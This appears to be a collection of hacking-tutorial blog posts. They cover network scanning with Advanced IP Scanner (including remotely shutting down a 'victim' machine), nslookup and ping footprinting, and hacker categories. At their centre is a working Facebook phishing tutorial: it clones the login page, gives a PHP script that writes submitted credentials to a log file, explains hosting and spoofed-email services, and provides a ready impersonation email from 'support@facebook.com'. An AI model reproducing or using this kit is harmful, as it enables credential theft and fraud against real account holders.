Network scanning is performed to collect information about live systems,open ports, and network vulnerabilities. Gathered information is helpful in determining threats and vulnerabilities in a network and to know whether there are any suspicious or unauthorized IP connections,which may enable data theft and cause damage to resources. This is just a basic tutorial how to use IP scanner tool which can be downloaded from here dl

Advanced IP Scanner is a free network scanner that gives you various types of information regarding local network computers.

After downloading tool follow the below steps :

  • Open the tool you can install it or just use portable option to run directly.

1

  • Enter the IP address range in the Select range field to which your PC is connected and Start Scan. (You can check your IP by typing ipconfig in commad prompt)

2(Scanning for Range 192.16.37.1 – 192.168.37.255)

3

  • Advanced IP Scanner scans all the IP address within the range and displays the scan results after completion.

4

  • In above screenshot  Advanced IP Scanner has detected the victim machine’s  IP address(192.168.37.157) with status as alive 
  • Right-click on the detected IP address.It will list Wake-On-LAN,Shutdown, and Abort Shutdown

5

  • The list displays properties of the detected computer, such as IP address, Name, MAC, and NetBIOS information.
  • You can forecfully Shutdown,Reboot, and Abort Shutdown the selected victim machine IP address.

6

  • Now you have the IP address, Name, and other details of the victim machine.You can control their system if you know the password.
  • Now I am going to shutdown victim’s machine, i know the username and password

7

  • The request of shutdown is processing.

9

  • When the victims machine is been shutdown,you receive “Succeeded” reply.

10


Information Collected:

  • IP address
  • System name
  • MAC address
  • NetBIOS information
  • Manufacturer
  • System Status

Advertisements

 

nslookup is a network administration command-line tool available for many computer operating systems for querying the Domain Name System (DNS) to obtain the domain name, the IP address mapping or any other specific DNS record.

 

Follow the below steps :

  • Launch command prompt from your start menu.
  • Type nslookup, and press Enter to open the tool in command prompt.

1

  • You can type help to see list of option that can be used with nslookup tool.

2

  • In the nslookup interactive mode,type “set type=a” and press Enter. Now, type www.certifiedhacker.com and press Enter. The response should be similar to the following figure.

3

Note: The DNS server Address (8.8.8.8)  will be different from the one shown in the screenshot.

  • You get Authoritative or Non-Authoritative answer. The answer varies, but in this case , it is Non-authoritative answer.
  • In nslookup interactive mode, type set type=cname and press Enter.Now type certifiedhacker.com and press Enter.The response should be similar to the bellow screenshot.

4

Note: The DNS server address(8.8.8.8) will be different than one in screenshot.

  • In nslookup interactive mode,type server 64.147.99.90(or any other IP address you receive in the previous step) and press Enter.
  • Now type set type=a and press Enter. Type www.certifiedhacker.com and press Enter. The response should be similar to the below screenshot.

5

  • If you receive a request timed out message, as shown in the previous figure,then your firewall is preventing you from sending DNS queries outside your LAN.
  • In nslookup interactive mode, type set type=mx and press Enter.
  • Now, type certifiedhacker.com and press Enter. The displayed response should be similar to the one shown in following screenshot.6

 


Information collected:

DNS Server  : 8.8.8.8

Non-Authoritative Answer : 202.75.54.101

CNAME(Canonical Name of an alias):

  • Alias: certifiedhacker.com
  • Canonical name :  google-public-dns-a.google.com

MX(Mail Exchanger): mail.certifiedhacker.com


 


In this article we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password

.
First of all open www.facebook.com in your web browser,

bandicam 2014-09-12 13-32-00-157

from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu.

bandicam 2014-09-12 13-17-20-980

 

bandicam 2014-09-12 13-23-44-373

 

 

Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad.

bandicam 2014-09-12 13-27-28-619

 

From edit menu select find, type action in it and locate following string.

<form id=”login_form”  action=

1

Now replace this action=”./Facebook_files/Facebook.htm” with action= “mail.php”

2

 

Now open notepad type following code in it and create mail.php.

Code:

<?php

header (‘Location: https://www.facebook.com/login.php?login_attempt=1 ‘);

$handle = fopen(“log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

Now save it as mail.php and create an empty log.txt file. Now you’ll need a free web hosting service that supports PHP.

code

 

complete

Click here and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

 

Now sign up here   (It has free service but your IP will be included in the mail the receiver will receive,to avoid that create an account) it provides spoofed email service.Or you can use this website.(free but mail be delivered in spam folder)

 

Now create a message from support@facebook.com to your victim.

 

Sub: Invalid activity on your facebook account

Body:

Dear facebook user (victim’s facebook user name),

Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,

<link to phished site>

Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you’ll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

 

support@facebook.com,

Facebook, Inc,

1601 S.California Ave

Palo Alto CA 94394

US

mail

link

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

 


 

Counter measure:

  • You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box.
  • Always check the url when you are signing in (specially when you are redirected to login page for facebook check for “https://” )
  • Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

 


 ***

Footprinting using Ping command

Ping is a computer network administration utility used to test the reachability of host on Internet Protocol (IP) network and to measure the round-trip time for messages sent from the originating host to a destination computer ”

1.Open your command prompt

1

2.Type ping followed by website address. Here we will  ping certifiedhacker.com”

Just type   “ping www.certifiedhacker.com and hit enter

Output:

2

3.You receive the IP address 202.75.54.101 for www.certifiedhacker.com , Ping Statistics such as packet sent, received, lost and Approximate round-trip time.

4.Now find out the maximum frame size on the network. In command Prompt, type

 ping www.certifiedhacker.com –f –l 1500

Output:

4

5. You receive “Packet needs to be fragmented but DF set”, it means that the frame is too large to be on the network and needs to be fragmented. Since we used –f switch with the ping command, the packet was not sent, and the ping command returned this error.

 

6.Now let’s ping with reducing frame size to 1300

Output:

6

 

7.You can see the maximum packet size is less than 1500 bytes and more than 1300 bytes.

Try different values until you find the maximum frame size.For instance,

ping www.certifiedhacker.com –f –l 1453 replies with Packet needs to be fragmented but DF set and ping www.certifiedhacker.com –f –l 1452 replies with a successful ping.

It indicates that 1452 bytes is the maximum frame size on this machine network.

Output :

7

NOTE: The maximum frame size will differ depending upon on the network.

 

8.Every frame on the network has TTL defined. If TTL reaches 0, the router discards the packet. This mechanism prevents the loss of packets.

type ping www.certifiedhacker.com –i 3

The Output should be similar but with different IP address.

Output:

8

 

9.Reply from 61.8.59.185: TTL expired in transit means the router discarded the frame, because its TTL has expired (reached 0).You can use Emulate tracert command to find the route from your computer to www.certifiedhacker.com (destination address).

Output:

9

10. In the command prompt type

 ping www.certifiedhacker.com –i 1 –n 1

(Use –n 1 in order to produce only one 1 packet transmission)The response should be similar to the below output

Output:

 10

Type ping www.certifiedhacker.com –i 2 –n 1

Response should be similar to the below output

Output :

11

Type ping www.certifiedhacker.com –i 3 –n 1

Output :

 11as

11. We have received the answer from the same from the same IP address in two different steps. this one identifies the packets filter; some packet filters do not decrement TTL and are therefore invisible.
Repeat the above step until you reach the IP address for www.certifiedhacker.com(in this case 202.75.54.101)

 

12

 The successful ping to reach www.certifiedhacker.com is 10 hops.


 

Information Collected:

IP Address : 202.75.54.101

Ping Statistics:

  • Packet Sent – 4
  • Packet Received – 4
  • Packet loss – 0
  • Approximate Round Trip Time – 93 ms

Maximum Frame Size : 1452 bytes

TTL Response : 10 hops


 

Hackers are classified according to activity they perform on system or network,below are the main nine classification of hackers:-

Black hat – A Black Hat hacker, also known as a cracker,  is a computer professional with deep knowledge in Computer Networking, Network Protocols and System Administration . Black Hat hacker has also good knowledge in many hacking tools and know how to program hacking tools. A Black Hat hacker uses his skills for unethical reasons. A Black Hat hacker always has malicious intention for intruding a network.

Gray hat – Gray hats are the individuals who work both offensively and defensively at various times.Gray Hat hacker is someone who is between White Hat hacker and Black Hat hacker.Gray Hat normally do the hacking without the permissions from the administrators of the network he is hacking. But he will expose the network vulnerabilities to the network admins and offer a fix for the vulnerability for money.

White hat – A White Hat hacker has deep knowledge in Computer Networking, Network Protocols and System Administration. White Hat hacker has also good knowledge in hacking tools and know how to program hacking tools.

Suicide hackers – Suicide hackers are those who hack for some purpose and even don’t bother to suffer long term jail due to their activities. They can be bad as well as good.

Script kiddies – A Script Kiddie is basically a hacker amateur who doesn’t has much knowledge to program tools to breaks into computer networks. He often use downloaded hacking tools from internet written by other hackers/security experts.Script kiddies usually focus on the quantity of attacks rather than the quality of the attacks that they initiate.

Spy hacker – Spy hackers are individuals who are employed by an organization to penetrate and gain trade secrets of the competitor. These insiders can take advantage of the privileges they have to hack a system or network.

Cyber TerroristA programmer who breaks into computer systems in order to steal or change or destroy information as a form of cyber-terrorism

State sponsored hackers – State sponsored hackers are individuals employed by the government to penetrate and gain top-secret information and to damage information systems of the governments.

Hacktivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.

Ethical_Hacking-370x180

What is hacking?

Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator’s original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it’s not limited to either of them.